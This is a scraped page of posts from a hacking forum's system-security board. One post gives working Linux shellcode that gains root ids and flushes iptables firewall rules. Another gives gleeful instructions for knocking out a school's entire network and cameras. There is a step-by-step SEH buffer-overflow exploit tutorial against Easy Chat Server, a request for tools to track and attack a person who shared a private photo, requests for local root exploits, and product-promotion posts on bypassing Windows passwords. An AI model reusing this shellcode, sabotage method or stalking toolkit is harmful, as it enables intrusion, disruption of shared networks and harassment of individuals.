System Security - iExploit

Bluetooth brut force

Clay7355 — Sun, 17 Feb 2013 10:52:52 -0500

Is there a app that I can install on my iPhone 4S iOS 6.0.1 that uses OpenSSh to login into other device that can mirror the screen of the device on to my iPhone 4s

Favourite Linux IDS?

Xin — Tue, 22 Feb 2011 23:05:31 -0500

Ive used quite a few and i have to say my favourite is the CLI snort, although im thinking of trying out the webbased version of it.

Some fairly good Buffer Overflow Tuts i stumbled upon

Mr. P-teo — Sat, 12 Jan 2013 06:28:38 -0500

Part 1)

Part 2)

Part 3)

Part 4)

Cam across these whilst browsing google, they are helping me and so maybe they can help someone else as well.

Hack tools for linux

Last_Gunslinger — Wed, 03 Oct 2012 13:29:37 -0400

Hello, im doing some private work for a friend, someone is spreading lies and
roomers about her, she sent me a pic of her in a thong that people were
sending around and start talking alot of trash. She hired me to track
him down, and this alot more then im actually used to doing (im a
network security professional), and i need a list of programs comptible
with linux in these categories, command line or GUI not picky.
Password dictionary creater tools
windows os crashing software or something similar
phone tracing software
picture
reading or backtracing software (main intent is to read the fingerprint
and find which phone or computer it was orginally edited or taken from)
password crackers (http and https mainly)
a list of port scanner besides NMAP or angryip
email, and text reading sofware or client
and HDD crashers (not entirely needed but might be)
If this is banned or offensive in anyway feel free to say no to any or all programs listed above.
-Last_Gunsliner

What is your method for Backups?

Xin — Fri, 13 Apr 2012 05:18:52 -0400

What do you back it up onto and on how many different devices?

Also do you guys use cloud or not?

How to Crash Some School Networks

Xin — Sun, 14 Mar 2010 01:13:49 -0500

Heres a little trick thats very effective on taking down the WHOLE School Network. Found it out on my School Network.

Works only on Ethernet connection networks.
Find two PCs next to each other plugged into the Ethernet wall socket,
Take the ethernet cable out of one pc and plug it into the other so there is two cables plugged into the same pc. This confuses the hell out of the network and Shuts it down. This took down ALL the computers around the school and ALL the security cameras. It cant be fixed until they find the pc with 2 plugs in and take them out and reboot the network.

Enjoy :D

Few question, can anyone help?

Mr. P-teo — Sat, 25 Aug 2012 14:09:48 -0400

So iv been looking into system hacking, more specifically the ability to identify vulnerabilities in operating systems and exploit them to gain access(eventually get root). This is a topic that doesn't seem to have alot of tutorials, guides or help so i was wondering...

1) Im on linux mint, what tool can i use to identify vulnerabilities, i know i can use nmap and see if i can exploit any running processes but what else.

2) is there anywhere i can get more information on this OS hacking, or do i just have to keep poking around forums and asking odd questions?

SEH based buffer overflow tutorial - Exploiting Easy Chat Server

undead — Sun, 19 Feb 2012 03:43:47 -0500

In this tutorial I will exploit a vulnerable program called Easy Chat Server in order to demonstrate how to create a SEH based BoF exploit.

As you can see at exploit-db http://www.exploit-db.com/exploits/8142/ Easy Chat Server has username and password parameters vulnerable to buffer overflow.

We can exploit this buffer overflow vulnerability via a GET HTTP request by giving our payload as input for the username parameter instead of giving a normal username. Password parameter doesn't matter.
Now it's time to create a program which will exploit this vulnerability.
Let's see what happens if we pass 1000 A's to the username parameter
http://i.imgur.com/iNulm.png

http://i.imgur.com/wGffY.png

http://i.imgur.com/arTbN.png

We get the message "Access violation when reading [41414141] - ..." and if you press Alt + s you will notice that we've corrupted the SEH chain and it has been overwriten with 41414141 (A's in hex).

The next step is to follow this address in the stack (right click and select this option) and now we should figure out the offset of the pointer to next SEH record and the exception handler.
To do this I will use pattern_create and pattern_offset tools provided by metasploit.

root@root:~# /pentest/exploits/framework/tools/pattern_create.rb 1000

and now we need to replace the 1000 A's with the 1000 character string created by pattern_create tool
http://i.imgur.com/MOqVN.png

and now let's run the python program again.

http://i.imgur.com/sefvA.png

By using the pattern_offset tool we can figure out the offset to the pointer to next seh record, the offset of exception handler will be the previous offset + 4

root@root:/pentest/exploits/framework/tools# ./pattern_offset.rb Ah2A
216
root@root:/pentest/exploits/framework/tools# ./pattern_offset.rb h3Ah
220

as expected

By knowing where pointer to next seh record and seh is we can overwrite them with whatever we want.
Let's update our python code and do this
http://i.imgur.com/baLyg.png
and there we go
http://i.imgur.com/ej4zM.png

Now we want to execute our shellcode on the remote system but how are we going to accomplish this?

First we will overwrite the pointer to next seh record with a short JMP for 6 bytes (\xeb\x06\x90\x90)
so we will jump over the exception handler and land to our payload
eb is the opcode for jmp and 90 is for nop as you already know :)
why 6 bytes? \xeb\x06 occupies 2 bytes, the next two bytes are nops and the next four bytes are the pointer to the exception handler. So 2 + 4 = 6 bytes.

The next thing to do is overwrite to pointer to exception handler so it will point to a pop/pop/ret sequence.
To find a pop/pop/ret sequence we must search in a module without safeseh.

To find modules that aren't safeseh protected I'm going to use pvefindaddr by c0relanc0d3r.

http://i.imgur.com/HarXZ.png

press alt+e and double click on that module.
Now right click and Search for... Sequence of commands and now search for an address that does not contain a null byte by pressing control+L

http://i.imgur.com/9zG9k.png

or you can easily use pvefindaddr like this: !pvefindaddr p SSLEAY32. Then search for a suitable address in the output file.

To finish the exploit replace CCCC with the address of pop/pop/ret sequence and then add your shellcode to buffer variable.

Run the exploit and the shellcode should be executed.

Linux Screenshots

Bursihido — Mon, 25 Oct 2010 20:10:19 -0400

http://i.imgur.com/StNsL.png
Arch linux + Awesome Wm

Post your own linux screenshot

Bypass Windows XP Password on a DELL Laptop

cheeryking — Mon, 20 Aug 2012 05:41:00 -0400

Question: I have a DELL Laptop with windows XP and have forgotten my password. F8 restart isn't working. I tried what someone else had recommended for another person who had DELL with Windows XP but this restart with f8 function isn't doing anything.

Following are 4 answers to this question. The strengths and weaknesses of each answer are also listed for your reference. Pick up one of these tips based on your case. Need to bypass xp password? you can!

Answer 1. Reinstall Windows

If you have nothing important on the computer or don’t mind losing data, it’s an effective option. But I think this should be the last solution for most PC users to get windows xp password bypass.

Strengths: Allow you to access the computer gain.

Weaknesses: Windows setup CD is required and computer data will be erased.

Answer 2. Apply a free software called Ophcrack.

It is free open source program that can bypass Windows xp password by using LM hashes through rainbow tables.

Strengths: It is a free software and can be downloaded on the Internet

Weaknesses: If you are a newbie, it’s not recommended as it requires some computer skills and the password recovery rate is not guaranteed.

Answer 3. Use Windows Password Recovery Tool

Windows Password Recovery Tool is an easy-to-use tool designed for resetting Windows local account or domain passwords on any Windows system. Passwords can be reset in 3 minutes, no matter how long and complicated the password is. Besides password recovery function, it even can change any local admin/user/domain admin password, and create a new Administrator account via CD/DVD or USB drive.

Strengths: Easy (3 steps: Download – Burn - Reset); Fast (Only 3 minutes even less); Safe (Read-only and non-destructive design, no any data loss or damage)

Weaknesses: Shareware ($ 17.95 for Standard edition and $29.95 for Professional edition )

Answer 4: Take your laptop to a computer repair shop.

By this way, you have no need to learn how to bypass windows xp password, as you just have it done by computer expert.

Strengths: Convenient

Weaknesses: Expensive

Are you satisfied with these answers? If you have more useful way to bypass XP password, please feel free to share with us.

How to crack laptop password without a password reset disk?

cheeryking — Mon, 20 Aug 2012 05:39:44 -0400

Recently I bought a DELL computer. It runs on Windows XP., I added a strong password to my pc so as to protect my files stored on it from being viewed by others. It may be too strong and I cannot remember what the password is now.

What is worse, I failed to find the password reset disk I once created. And there’s only one user account on the pc.

I know I can reinstall Windows. But I am afraid of losing my important files. So this begs the question: If you lost Windows password without a password reset disk, how to crack a password on a laptop without losing anything?

A friend of mine intended me that I have two options. First, I can download a free Windows password cracker called Ophcrack. It is a free open source (GPL licensed) program that cracks windows password by using LM hashes through rainbow table. But it’s somewhat too difficult for me. What is more, It is time cosuming to crack laptop password with it. At the least, I just think so.

Second, try using Windows Password Recovery Tool instead. He told me that this app is easier and more efficient if I need to crack laptop password and avoid losing data.

As a newbie, I opt for this software, though it costs me a few dollars. I don’t mind using a paid tool if this tool can really fix my trouble. I downloaded and installed Windows Password Recovery Tool in my brother’s computer. Then I was able to create a bootable password reset CD in seconds. After this, I started my computer from the disk and I can access Windows Password Recovery Tool . Next I easily reset the forgotten password to blank by following the instructions. And now I can log into my computer again.

By using this software, I cracked my laptop password successfully. No any computer skill required and 100% security is also guaranteed. Need to crack laptop password? Just have a try of this tool.

How to Recover Lost Password for Windows Vista?

Lnicole — Tue, 29 May 2012 00:07:25 -0400

It would be more complicated to deal with the problem when lost Windows Vista password.

Many people use passwords to protect access to computers. It is a
simple yet effective way to protect sensitive data and equipment.
Unfortunately, by their very nature, passwords can be easy to be lost
or forgotten. This can be an especially difficult problem when the
forgotten password is for Windows Vista. This is because a lot of
different functions available on XP are not available on Vista.

An administrator password cannot be changed without knowing the original password on Vista.

In Windows XP, one can change an administrator password even without
knowing its original password. Do you know how? It’s pretty easy. The
first step is to right click “My Computer”. Then in its options, choose
“Manage” → “Local Users and Groups” → “Users”. Click the targeted
account and “Set Password” for it without tying its original password.
However, if you forgot or lost an administrator password on Vista, you
cannot solve the problem in this way unless you can remember the
original password. Then, any other chances to recover the lost Vista
password?

Best way to crack Vista password—to use a password recovery software program.

If you do not mind losing data on your Vista machine, then
reinstalling your machine could be a solution. But I don’t recommend
people using this way to rescue a locked computer sine lots of time and
data will be lost. Then, to use a password recovery software program,
in my opinion sometimes could be the best or even the only way to
recover Vista password. What is the password recovery software program?
Here I would suggest Windows Password Recovery Tool Standard.

How to use Windows Password Recovery Tool Standard to reset lost Vista password?

Step1: Download and install Windows Password Recovery Tool Standard on a working PC.

Step2: Burn CD/DVD with the program.

Step3: Set the target computer boot from CD/DVD.

Step4: Reset the forgotten Vista password with the burned CD/DVD. Then log on to your Vista pc without a password.

Above are the easy steps on how Windows Password Recovery Tool
works. If you don’t have an extra CD or DVD, you can also use a USB
flash drive to replace it but at this time you need to use another
version of this tool—Windows Password Recovery Tool Professional. This
version has more functions than the Standard one, if you are in need of
Windows Vista password reset for your lost Vista admin password, and interested in this tool, you can get more information by Google search “Windows Password Recovery Tool 3.0”.

Source: http://www.blog.windowspasswordsrecovery.com/lost-vista-password.htm

setreuid(0,0) -> execve(/sbin/iptables, -F, NULL) -> exit(0) - [76bytes]

Sh3llc0d3 — Thu, 12 Apr 2012 17:31:27 -0400

Just thought i'd add some of the code i've been submitting etc.

/* 
 *	Author: Sh3llc0d3
 *	Environment: Linux/x86
 *	Developed from: GNU ASM (AT&T Syntax)
 *	Purpose: [setreuid()] -> [/sbin/iptables -F] -> [exit(0)]
 *	Size: 76 bytes
 *
 */
char code[] =	"\xeb\x33\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x5e\x31\xc0\x88\x46"
		"\x0e\x88\x46\x11\x89\x76\x12\x8d\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0"
		"\x0b\x89\xf3\x8d\x4e\x12\x8d\x56\x1a\xcd\x80\x31\xc0\xb0\x01\x31\xdb"
		"\xcd\x80\xe8\xc8\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61"
		"\x62\x6c\x65\x73\x23\x2d\x46\x23";

int main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) code;
	(int)(*func)();
}

HOW TO LOCATE A VM ENVIRONMENT

McKittrick — Wed, 04 Apr 2012 23:41:30 -0400

i recently read a great book that tapped into this subject briefly. the idea and the tool used are from an amazing researcher named Joanna Rutkowska. the tool she wrote is called Red Pill. it is really a rootkit (and one of the most advanced ones out there).

the idea behind what she did was based on the fact that every operating system has an IDT (Interrupt Descriptor Table). this is a place that stores all interrupt address ranges. it it usually found in the first 100 bytes on a standard hard drive. what she found is that, when in a VM environment, this table is moved up further in memory since there is a virtual disk being used by the VM. the Red Pill tool calls upon the register IDTR to locate where the IDT is located. if it is found in the first few bytes, you are seeing the main OS environment, if further up, then we know a VM is being used. i found that quite amazing. i am assuming this can also be done on a remote level as well, maybe with a Meterpreter session being used to extract data like how a null session does in Windows or also using WMI APIs

the book in reference to what i just wrote is "Counter Hack Reloaded". the article mentions that from what the author knows, as of now, there is still no way to "jump" outside of a VM environment into the main OS one. does anyone know of this happening yet?

Help needed .

Hardcore-Gabber — Fri, 16 Mar 2012 22:09:00 -0400

Please help me how to use this exploits to work properly ??

http://pastie.org/private/feg8du0e9kfagng4rrg
http://pastebin.com/UzDKcCQy

Thanks

Ftp exploit ?

Hardcore-Gabber — Sun, 18 Mar 2012 01:22:20 -0400

Please help me .. i have readed the whole page but cannot understand how to use this exploit ..

http://www.exploit-db.com/exploits/15215/

Local root

Hardcore-Gabber — Tue, 06 Mar 2012 12:45:44 -0500

Please someone cane give me a working local root exploit for this kernel .. have tried some of the public exploits that have founde on forums and google but no luck ..

Apache/2.2.3 (CentOS). PHP/4.4.9
Kernel: Linux 2.6.18-128.2.1.el5PAE #1 SMP Tue Jul 14
07:15:01 EDT 2009 i686

DLLs

chroniccommand — Sat, 17 Mar 2012 00:32:09 -0400

[align=center] [Paper: DLLs]
[Author: Chroniccommand]
[E-Mail: chroniccommand@gmail.com]
[iExploit]
[/align]

[Introduction]
Well, I'm back(I guess). I've been away for quite some time and I haven't really been in the security game lately, but I've decided to write a brief paper to get me started. This article is simply about DLLs in Windows. I'll start by explaining the basics of DLLs, how they work etc. I'll get into DLL hijacking and injecting near the end and provide some links to learn more about them.
------------------------------------------------

[DLLs]
The first thing you're going to know for DLL injecting/hijacking is what a DLL is. DLL stands for Dynamic Link Library. Basically a DLL is a shared library using Portable Executable(PE) file format. A DLL works sort of like an EXE, but cannot be executed if it is not linked to an executable program. The advantage to this is DLLs won't take up RAM while the program is running. Once the program needs something that is in the DLL, it runs it. If the code isn't needed, it isn't used. If the DLL needs to be updated at all, it will not need to be re-linked to the executable that uses it. Additionally, a DLL will run within the same space as the linked executable with similar permissions(unless otherwise granted).
DLLs are loaded either during load time or run time. During load time the program will call the DLL using a header file and a lib file. DLLs are generally created in C++ now a days, but can be created by a number of other programming languages.
If you look in a folder for some programs, you should notice some DLLs within the same folder.
Example:
http://desmond.imageshack.us/Himg138/scaled.php?server=138&filename=dll1.png&res=medium
The image is from a program known as Dolphin(Gamecube/Nintendo Wii emulator).
Those DLLs will either be called at run or load time by dolphin to preform different tasks.

A program called resource hacker can actually analyze DLLs and EXEs for you and display some information about them. As an example I chose explorer.exe(Windows Explorer) located in

C:\Windows\

Explorer has many things you can view in resource hacker such as bitmaps for icons that are used:
http://img14.imageshack.us/img14/333/dll2.png
That is obviously the start icon, which can also be changed and customized to your liking with resource hacker.
Another example, the executable information viewed within resource hacker:
http://img14.imageshack.us/img14/7509/dll3.png
-----------------------------------------------------

[DLL hijacking]
DLL hijacking is something I won't go to in depth with, and I will leave you some good links to read up on it. But basically, DLL hijacking is the act of replacing an original DLL with a malicious DLL in the same working directory. When the linked executable runs the DLL it will run the attackers malicious code. When this exploit was discovered tons of zero days were unearthed in many major programs including Adobe reader and iTunes.
Links to read up on DLL hijacking:
Metasploit: Exploiting DLL hijacking flaws
Exploiting dll hijack in real world
DLL hijacking vulnerabilities
----------------------------------------------------
[DLL Injection]
DLL injecting is the process of injecting malicious code into a program by inserting your own DLL. Sound familiar? Yea, it's somewhat like Buffer Over-Flows where you rewrite the EIP to jump to code you would like to execute, but that's for a different paper. DLL injecting can be done in a variety of different ways. In a tutorial written by Robert Kuster, Robert lists 3 different techniques:
[list=1]
[*]Windows Hooks[/*:m]
[*]The CreateRemoteThread & LoadLibrary Technique[/*:m]
[*]The CreateRemoteThread & WriteProcessMemory Technique[/*:m][/list:o]
In this same tutorial, Robert creates a demo program which can gain hidden password text from a program and display it in plain text. It's most definitely worth a read for those interested, and is a great tutorial.

Three Ways to Inject Your Code into Another Process
DLL Injection and function interception tutorial
-----------------EOF-----------------

What steps would you recommend??

Mr. P-teo — Mon, 29 Aug 2011 23:52:45 -0400

so, iv always wanted to be able to hack systems, i know a little webhacking but i want to be able to get the systems etc. so what step's and tools would you recommend???

What OS?
What Tut's?

Thanks to anyone that helps me.

Environment variables

x3n0n — Sat, 10 Sep 2011 03:27:51 -0400

Everyone knows environment variables (PATH, USER, LOGNAME, etc...)
Well you can overwrite these variables (export ="") and that can be quite handy with buffer overflows. But what I find hard is after I run a program (say I did a buffer overflow) and I want to find the environment variable USER and it's content in the stack. I had some piece of code that supposed to get me the address (in hex): char *address = (char *)getenv(\"USER\"); printf(\"Address: %x\n\", &address); but when I look at the returned address, its all 'random' shit I don't need. So does anybody know how I can find the address of the env variable? Thx up front ;)